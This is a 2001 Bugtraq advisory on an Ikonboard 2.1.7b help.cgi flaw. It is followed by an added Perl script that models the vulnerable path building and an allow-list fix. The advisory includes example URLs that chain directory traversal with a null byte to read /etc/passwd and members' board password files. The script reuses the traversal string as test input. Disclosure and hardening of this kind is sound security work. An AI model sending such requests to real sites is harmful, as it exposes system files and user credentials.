Bugtraq mailing list archives

Ikonboard v2.1.7b "show files" vulnerability


From: "Martin J. Muench" <muench () GMC-ONLINE DE>
Date: Sun, 11 Mar 2001 18:43:09 +0100

-[ Product: Ikonboard
-[ Version: 2.1.7b
-[ OS: Unix, NT
-[ Vendor: Notified, http://www.ikonboard.com

-=[ Summary ]=-

This is another bug in the Ikonboard.
Anyone can read any file on the remote system with
the privileges of the web server.

-=[ Problem ]=-

File: help.cgi

---[L.44]---
$inhelpon = $query -> param('helpon');
---
As we can see, $inhelpon is the input for 'helpon'.

---[L.95-97]---
$filetoopen = "$ikondir" . "help/$inhelpon.dat";
$filetoopen = &stripMETA($filetoopen);
open (FILE, "$filetoopen") or die "Cannot locate the required files";
---
Well, it sets the file, runs it through the filter and opens it.
-> $inhelpon, remember?! ;)

Ok, I am not going to post the whole filter it uses, because they really
have been able to write a filter that is 24 lines long.
And they finally forgot to filter the backslash, so we can easily just
attach the 'poison null-byte' to '$inhelpon' and we escape the '.dat'.
And of course the script doesn't check for "..", so we can specify
every path we want.

-=[ Exploit ]=-

Example:

http://www.gmc-online.de/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00
- would show the password file, if it is readable with the privileges of
  the web server.

http://www.gmc-online.de/cgi-bin/ikonboard/help.cgi?helpon=../members/<member>.cgi%00
- replace <member> with the member name and it shows you his/her
  board-password. (works with Administrator accounts too)

-=[ Patches ]=-

Not yet available.
You could fix the script temporarily by inserting the following line
under line 45 in 'help.cgi':

$inhelpon =~ s/\///g;

This is lame, but it works.

-=[ Greetings ]=-

Neilk - learned alot from you!
Marc Ruef - I promised it ;)
DukeCS - thanks for everything!
Marko - thanks for your help!
Tribunal - you taught me alot, thanks
ICB - long time no speak
Svoern - "go get 'em" ;)


So long,

Martin J. Muench <muench () gmc-online de>
http://mjm.gmc-online.de
http://www.german-secure.de

"Perl - The only language that looks the same before and after RSA
encryption."
- Keith Bostic
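As an added example (not Ikonboard's code and not part of the original post), the script below models the path construction from help.cgi beside an allow-list check for 'helpon', which rejects NUL bytes, both kinds of path separator and ".." in one rule instead of stripping one character at a time. It assumes $ikondir ends with a slash and that help topics are plain names stored as help/<name>.dat; the NUL truncation is modelled with split because current Perl refuses such paths in open().

```perl
#!/usr/bin/perl
# Added example, not Ikonboard's own code. Assumes $ikondir ends in '/'
# and help topics are plain names stored as help/<name>.dat.
use strict;
use warnings;

# Vulnerable construction from help.cgi (stripMETA omitted): the parameter
# is pasted into the path and only then is ".dat" appended.
sub unsafe_help_path {
    my ($ikondir, $inhelpon) = @_;
    return "$ikondir" . "help/$inhelpon.dat";
}

# What the C library sees: a NUL byte ends the string, so the ".dat"
# suffix after it is silently dropped. Modelled with split (assumption:
# the old Perl/C behaviour the advisory describes).
sub path_as_seen_by_libc {
    my ($path) = @_;
    return (split /\0/, $path, 2)[0] // '';
}

# Hardened check: accept only a short topic name of safe characters.
# NUL, "/", "\", "..", spaces and empty input all fail the match, so no
# list of bad characters has to be kept complete.
sub validate_helpon {
    my ($inhelpon) = @_;
    return undef unless defined $inhelpon;
    return undef unless $inhelpon =~ /\A[A-Za-z0-9_-]{1,32}\z/;
    return $inhelpon;
}

sub safe_help_path {
    my ($ikondir, $inhelpon) = @_;
    my $topic = validate_helpon($inhelpon);
    return undef unless defined $topic;
    return "${ikondir}help/$topic.dat";
}

if (!caller) {
    my $ikondir = '/var/www/cgi-bin/ikonboard/';    # constructed sample
    for my $p ('posting', "../../../../../etc/passwd\0", 'a b', '..') {
        (my $shown = $p) =~ s/\0/%00/g;
        printf "%-30s unsafe=%-45s safe=%s\n", $shown,
            path_as_seen_by_libc(unsafe_help_path($ikondir, $p)),
            safe_help_path($ikondir, $p) // 'REJECTED';
    }
}
```

Running it prints the truncated path the vulnerable construction would open for the traversal input and REJECTED for every input that is not a plain topic name.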

